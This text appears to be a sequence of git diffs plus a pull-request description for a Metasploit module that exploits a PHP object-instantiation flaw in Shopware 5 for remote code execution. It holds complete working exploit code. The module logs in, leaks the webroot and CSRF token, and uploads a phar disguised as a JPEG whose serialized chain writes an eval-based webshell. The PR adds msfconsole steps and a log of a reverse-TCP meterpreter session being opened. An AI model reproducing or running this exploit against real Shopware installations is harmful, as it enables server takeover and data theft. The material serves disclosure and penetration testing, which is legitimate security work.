     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
-      'cookie' => @cookie,
+      'cookie' => cookie,
       'headers' => {
-        'X-CSRF-Token' => @csrf_token
+        'X-CSRF-Token' => csrf_token
       }
     )
     unless res
@@ -185,19 +177,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
       bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
-      @phar_loc = "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
       register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
-      return
+      return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
     end
-    if @phar_loc.blank?
-      fail_with(Failure::Unknown, "Cannot find phar archive")
-    end
+    fail_with(Failure::Unknown, "Cannot find phar archive")
   end
 
-  def trigger_bug
+  def trigger_bug(cookie, csrf_token, upload_path)
     sort = {
       "Shopware_Components_CsvIterator" => {
-        "filename" => "phar://#{@phar_loc}",
+        "filename" => "phar://#{upload_path}",
         "delimiter" => "",
         "header" => ""
       }
@@ -205,9 +194,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
-      'cookie' => @cookie,
+      'cookie' => cookie,
       'headers' => {
-        'X-CSRF-Token' => @csrf_token
+        'X-CSRF-Token' => csrf_token
       },
       'vars_get' => { 'sort' => sort.to_json }
     )
@@ -226,13 +215,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    do_login
-    leak_csrf
+    cookie = do_login
+    csrf_token = leak_csrf(cookie)
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
-      'cookie' => @cookie,
-      'headers' => { 'X-CSRF-Token' => @csrf_token }
+      'cookie' => cookie,
+      'headers' => { 'X-CSRF-Token' => csrf_token }
     )
     if res.code == 200 && res.body =~ /Shop not found/i
       return Exploit::CheckCode::Vulnerable
@@ -247,19 +236,19 @@ class MetasploitModule < Msf::Exploit::Remote
     @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
     @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
     @header   = Rex::Text.rand_text_alpha_upper(2)
-    do_login
-    print_good("Stage 1 - logged in with #{datastore['username']}: #{@cookie}")
-    get_webroot
-    print_good("Stage 2 - leaked the webroot: #{@webroot}")
-    leak_csrf
-    print_good("Stage 3 - leaked the CSRF token: #{@csrf_token}")
-    phar = generate_phar
+    cookie = do_login
+    print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")
+    webroot = get_webroot(cookie)
+    print_good("Stage 2 - leaked the webroot: #{webroot}")
+    csrf_token = leak_csrf(cookie)
+    print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
+    phar = generate_phar(webroot)
     print_good("Stage 4 - generated our phar")
-    upload(phar)
+    upload(cookie, csrf_token, phar)
     print_good("Stage 5 - uploaded phar")
-    leak_upload
-    print_good("Stage 6 - leaked phar location: #{@phar_loc}")
-    trigger_bug
+    upload_path = leak_upload(cookie, csrf_token)
+    print_good("Stage 6 - leaked phar location: #{upload_path}")
+    trigger_bug(cookie, csrf_token, upload_path)
     print_good("Stage 7 - triggered object instantiation!")
     exec_code
   end

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def do_login(check)
+  def do_login
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
@@ -70,10 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       return cookie
     end
-    if check
-      return
-    end
-    fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+    return
   end
 
   def get_webroot(cookie)
@@ -88,7 +85,24 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.code == 200
       return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
     end
-    fail_with(Failure::Unknown, "Unable to leak the webroot")
+    return
+  end
+
+  def leak_csrf(cookie)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      if res.headers.include?('X-Csrf-Token')
+        return res.headers['X-Csrf-Token']
+      end
+    end
+    return
   end
 
   def generate_phar(webroot)
@@ -132,28 +146,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return phar
   end
 
-  def leak_csrf(cookie, check)
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
-      'cookie' => cookie
-    )
-    unless res
-      fail_with(Failure::Unreachable, "Connection failed")
-    end
-    if res.code == 200
-      if res.headers.include?('X-Csrf-Token')
-        return res.headers['X-Csrf-Token']
-      else
-        return 
-      end
-    end
-    if check
-      return
-    end
-    fail_with(Failure::Unknown, "Unable to leak the CSRF token")
-  end
-
   def upload(cookie, csrf_token, phar)
     data = Rex::MIME::Message.new
     data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
@@ -171,9 +163,9 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200 && res.body =~ /Image is not in a recognized format/i
-      return
+      return true
     end
-    fail_with(Failure::Unknown, "Unable to upload phar archive")
+    return
   end
 
   def leak_upload(cookie, csrf_token)
@@ -188,13 +180,12 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
     end
-
     if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
       bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
       register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
       return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
     end
-    fail_with(Failure::Unknown, "Cannot find phar archive")
+    return
   end
 
   def trigger_bug(cookie, csrf_token, upload_path)
@@ -229,11 +220,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    cookie = do_login(true)
+    cookie = do_login
     if cookie.nil?
       return Exploit::CheckCode::Safe
     end
-    csrf_token = leak_csrf(cookie, true)
+    csrf_token = leak_csrf(cookie)
     if csrf_token.nil?
       return Exploit::CheckCode::Safe
     end
@@ -256,17 +247,31 @@ class MetasploitModule < Msf::Exploit::Remote
     @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
     @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
     @header   = Rex::Text.rand_text_alpha_upper(2)
-    cookie = do_login(false)
+    cookie = do_login
+    if cookie.nil?
+      fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+    end
     print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")
     web_root = get_webroot(cookie)
+    if web_root.nil?
+      fail_with(Failure::Unknown, "Unable to leak the webroot")
+    end
     print_good("Stage 2 - leaked the web root: #{web_root}")
-    csrf_token = leak_csrf(cookie, false)
+    csrf_token = leak_csrf(cookie)
+    if csrf_token.nil?
+      fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+    end
     print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
     phar = generate_phar(web_root)
     print_good("Stage 4 - generated our phar")
-    upload(cookie, csrf_token, phar)
+    if !upload(cookie, csrf_token, phar)
+      fail_with(Failure::Unknown, "Unable to upload phar archive")
+    end
     print_good("Stage 5 - uploaded phar")
     upload_path = leak_upload(cookie, csrf_token)
+    if upload_path.nil?
+      fail_with(Failure::Unknown, "Cannot find phar archive")
+    end
     print_good("Stage 6 - leaked phar location: #{upload_path}")
     trigger_bug(cookie, csrf_token, upload_path)
     print_good("Stage 7 - triggered object instantiation!")

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def do_login
+  def do_login(check)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
@@ -64,7 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200
-      return res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first
+      cookie = res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first
+      if res.nil?
+        return
+      end
+      return cookie
+    end
+    if check
+      return
     end
     fail_with(Failure::NoAccess, "Authentication was unsuccessful")
   end
@@ -125,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return phar
   end
 
-  def leak_csrf(cookie)
+  def leak_csrf(cookie, check)
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
@@ -134,8 +141,15 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
     end
-    if res.code == 200 && res.headers.include?('X-Csrf-Token')
-      return res.headers['X-Csrf-Token']
+    if res.code == 200
+      if res.headers.include?('X-Csrf-Token')
+        return res.headers['X-Csrf-Token']
+      else
+        return 
+      end
+    end
+    if check
+      return
     end
     fail_with(Failure::Unknown, "Unable to leak the CSRF token")
   end
@@ -215,8 +229,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    cookie = do_login
-    csrf_token = leak_csrf(cookie)
+    cookie = do_login(true)
+    if cookie.nil?
+      return Exploit::CheckCode::Safe
+    end
+    csrf_token = leak_csrf(cookie, true)
+    if csrf_token.nil?
+      return Exploit::CheckCode::Safe
+    end
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
@@ -236,13 +256,13 @@ class MetasploitModule < Msf::Exploit::Remote
     @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
     @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
     @header   = Rex::Text.rand_text_alpha_upper(2)
-    cookie = do_login
+    cookie = do_login(false)
     print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")
-    webroot = get_webroot(cookie)
-    print_good("Stage 2 - leaked the webroot: #{webroot}")
-    csrf_token = leak_csrf(cookie)
+    web_root = get_webroot(cookie)
+    print_good("Stage 2 - leaked the web root: #{web_root}")
+    csrf_token = leak_csrf(cookie, false)
     print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
-    phar = generate_phar(webroot)
+    phar = generate_phar(web_root)
     print_good("Stage 4 - generated our phar")
     upload(cookie, csrf_token, phar)
     print_good("Stage 5 - uploaded phar")

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200
-      return res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
+      return res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first
     end
     fail_with(Failure::NoAccess, "Authentication was unsuccessful")
   end

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -1,0 +1,262 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
+      'Description' => %q(
+        This module exploits a php object instantiation vulnerability that can lead to RCE in
+        Shopware. An authenticated backend user could exploit the vulnerability.
+
+        The vulnerability exists in the createInstanceFromNamedArguments function, where the code
+        insufficiently performs whitelist check which can be bypassed to trigger an object injection.
+
+        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
+        the target system, resulting in remote code execution.
+
+        Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'mr_me <steven@srcincite.io>',      # discovery & msf module
+        ],
+      'References' =>
+        [
+          ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
+          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Mar 11 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Shopware path", '/']),
+        OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),
+        OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    if res.code == 200
+      @cookie = res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
+      return
+    end
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+  end
+
+  def get_webroot
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
+      'headers' => {
+        'Cookie' => @cookie,
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    if res.code == 200 && res.body =~ /DOCUMENT_ROOT/i
+      @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class=\"v\">(.*) <\/td><\/tr>/
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to leak the webroot")
+  end
+
+  def generate_phar()
+    @php = "#{@webroot}#{target_uri.path}media/#{@shll_bd}.php"
+    register_file_for_cleanup("#{@shll_bd}.php")
+    pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
+    pop << "s:#{@php.length}:\"#{@php}\";"
+    pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
+    pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"
+    pop << "a:3:{s:5:\"Value\";"
+    pop << "s:48:\"<?php eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"
+    pop << "s:7:\"Expires\";"
+    pop << "b:1;"
+    pop << "s:7:\"Discard\";"
+    pop << "b:0;}}}}"
+    f            = Rex::Text.rand_text_alpha_lower(8)
+    stub         = "<?php __HALT_COMPILER(); ?>\r\n"
+    f_contents   = Rex::Text.rand_text_alpha_lower(20)
+    crc32        = Zlib::crc32(f_contents) & 0xffffffff
+    manifest_len = 40 + pop.length + f.length
+    @phar  = stub
+    @phar << [manifest_len].pack('V')              # length of manifest in bytes
+    @phar << [0x1].pack('V')                       # number of files in the phar
+    @phar << [0x11].pack('v')                      # api version of the phar manifest
+    @phar << [0x10000].pack('V')                   # global phar bitmapped flags
+    @phar << [0x0].pack('V')                       # length of phar alias
+    @phar << [pop.length].pack('V')                # length of phar metadata
+    @phar << pop                                   # pop chain
+    @phar << [f.length].pack('V')                  # length of filename in the archive
+    @phar << f                                     # filename
+    @phar << [f_contents.length].pack('V')         # length of the uncompressed file contents
+    @phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
+    @phar << [f_contents.length].pack('V')         # length of the compressed file contents
+    @phar << [crc32].pack('V')                     # crc32 checksum of un-compressed file contents
+    @phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
+    @phar << [0x0].pack('V')                       # serialized File Meta-data length
+    @phar << f_contents                            # serialized File Meta-data
+    @phar << [Rex::Text.sha1(@phar)].pack('H*')    # signature
+    @phar << [0x2].pack('V')                       # signiture type
+    @phar << "GBMB"                                # signature presence
+    return
+  end
+
+  def leak_csrf
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
+      'headers' => {
+        'Cookie' => @cookie,
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    if res.code == 200 && res.headers.include?('X-Csrf-Token')
+      @csrf_token = res.headers['X-Csrf-Token']
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+  end
+
+  def upload
+    data = Rex::MIME::Message.new
+    data.add_part(@phar, 'image/jpg', nil, "from-data; name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'headers' => {
+        'Cookie' => @cookie,
+        'X-CSRF-Token' => @csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /Image is not in a recognized format/i
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to upload phar archive")
+  end
+
+  def leak_upload
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
+      'headers' => {
+        'Cookie' => @cookie,
+        'X-CSRF-Token' => @csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+
+    if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
+      bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
+      @phar_loc = "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
+      register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
+      return
+    end
+    fail_with(Failure::Unknown, "Cannot find phar archive")
+  end
+
+  def trigger_bug
+    sort = {
+      "Shopware_Components_CsvIterator" => {
+        "filename" => "phar://#{@phar_loc}",
+        "delimiter" => "",
+        "header" => ""
+      }
+    }
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'headers' => {
+        'Cookie' => @cookie,
+        'X-CSRF-Token' => @csrf_token
+      },
+      'vars_get' => { 'sort' => sort.to_json }
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    return
+  end
+
+  def exec_code
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "media", "#{@shll_bd}.php"),
+      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+    }, 0.1)
+  end
+
+  def check
+    do_login
+    leak_csrf
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'headers' => { 'Cookie' => @cookie, 'X-CSRF-Token' => @csrf_token }
+    )
+    if res.code == 200 && res.body =~ /Shop not found/i
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
+    @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
+    @header   = Rex::Text.rand_text_alpha_upper(2)
+    do_login
+    print_good("Stage 1 - logged in with #{datastore['username']}: #{@cookie}")
+    get_webroot
+    print_good("Stage 2 - leaked the webroot: #{@webroot}")
+    generate_phar
+    print_good("Stage 3 - generated our phar")
+    leak_csrf
+    print_good("Stage 4 - leaked the CSRF token: #{@csrf_token}")
+    upload
+    print_good("Stage 5 - uploaded phar")
+    leak_upload
+    print_good("Stage 6 - leaked phar location: #{@phar_loc}")
+    trigger_bug
+    print_good("Stage 7 - triggered object instantiation!")
+    exec_code
+  end
+end

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, "media", "#{@shll_bd}.php"),
       'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
-    }, 0.1)
+    }, 1)
   end
 
   def check


### PR DESCRIPTION
## Background

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.

## References

- [https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/](https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/)

## Notes

- I don't consider this a zero-day because it's a bypass for a patch
- I recommend the CVSS score to be 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
 
## Setup

The following is the exact setup I used to test and analyze the vulnerability:

- Debian GNU/Linux 9 (stretch) x64
- MariaDB latest
- Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo

For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).

## Verification

- [x] Install Shopware as noted above
- [x] Install the Metasploit module
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/shopware_createinstancefromnamedarguments_rce`
- [x] `set payload php/meterpreter/reverse_tcp`
- [x] `set LHOST x.x.x.x`
- [x] `set RHOSTS y.y.y.y`
- [x] `check`
- [x] `exploit`
- [x] **Verify** that you get a meterpreter session

## Example

```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg

meterpreter > sysinfo
Computer    : 45835d649528
OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter >
```